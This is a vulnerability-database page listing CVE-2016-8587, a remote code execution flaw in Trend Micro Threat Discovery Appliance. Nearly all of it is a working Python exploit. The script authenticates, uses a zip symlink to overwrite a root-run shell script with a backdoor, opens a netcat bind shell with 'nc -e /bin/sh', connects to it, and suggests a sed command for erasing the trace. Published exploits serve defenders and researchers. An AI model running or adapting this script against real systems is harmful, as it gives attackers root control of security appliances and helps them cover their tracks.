Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability (CVE-2016-8587)

🗓️ 21 Apr 2017 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 34 Views

Trend Micro Threat Discovery Appliance <= 2.6.1062r1 Remote Code Execution Vulnerabilit

Related
Code

                                                import os
import sys
import time
import zipfile
import requests
import threading
from cStringIO import StringIO

requests.packages.urllib3.disable_warnings()

def _get_bd():
    bd = """#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
`%s>/dev/null`
""" % c
    return bd

def _build_zip(CREATE_SYMLINK=False):
    """
    builds the zip file using a symlink attack into a folder...
    so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory
    and then crush the dlp_kill.sh only to then later get it executed
    resulting in rce as root.
    """
    if CREATE_SYMLINK:
        zipinfo = zipfile.ZipInfo()
        zipinfo.filename = u'si'
        zipinfo.external_attr |= 0120000 << 16L         # symlink file type
        zipinfo.compress_type = zipfile.ZIP_STORED
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    if CREATE_SYMLINK:
        z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
    else:
        zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
        zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo

        # backdooring code, as we do
        z.writestr(zipinfo, _get_bd())
    z.close()
    test = open('hax.zip','wb')
    test.write(f.getvalue())
    test.close()
    return f.getvalue()

def we_can_upload_a_zip(CREATE_SYMLINK=False):
    """
    uploads a zip file with php code inside to our target for exploitation
    """
    multiple_files = {
        'Q_UPLOAD_ID': (None, ''),
        'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
        'submit': (None, 'Import')   
    }
    r = s.post(upload_url, files=multiple_files, verify=False)
    if r.status_code == 200:
        return True
    return False

def unzip():
    try:
        r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
    except:
        pass
    return True

def we_can_login():
    r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        return True
    return False

def main():
    global c, s, t, p, login_url, unzip_url, upload_url
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <pass>" % sys.argv[0]
        print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
        sys.exit(-1)
    t = sys.argv[1]
    p = sys.argv[2]
    bu = "https://%s/" % t
    login_url  = "%scgi-bin/logon.cgi" % bu
    unzip_url  = "%scgi-bin/admin_dlp.cgi" % bu
    upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
    s = requests.Session()

    # 1st we bypass auth and login
    if we_can_login():

        # we just use a bind, demonstrating that the target doesnt even have a proper firewall!
        c = "nc -e /bin/sh -lp 2122"
        print "(+) logged into the target..."
        print "(+) performing initial preflight attack...!"
        print "(+) uploading the zipped symlink..."

        # 2nd we upload symlink attack
        if we_can_upload_a_zip(CREATE_SYMLINK=True):
            print "(+) successfuly uploaded the zipped symlink"
            print "(+) extracting the symlink..."

            # 3rd we extract it
            unzip()
            print "(+) extracted the symlink!"
            time.sleep(2)   # let the server process things
            print "(+) uploading the zipped dlp_kill.sh..."

            # 4th we upload the backdoor
            if we_can_upload_a_zip(CREATE_SYMLINK=False):
                print "(+) successfuly uploaded the zipped log_cache.sh"
                print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."

                # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                unzip()
                print "(+) extracted the dlp_kill.sh file!"
                print "(+) starting backdoor..."

                # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                thread = threading.Thread(target=unzip, args=())
                thread.daemon = True
                thread.start()
                print "(+) backdoor started !"
                print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
                print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
                time.sleep(2)
                os.system("nc %s 2122" % t)
if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Apr 2017 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.00526
trend microthreat discovery applianceremote code execution
34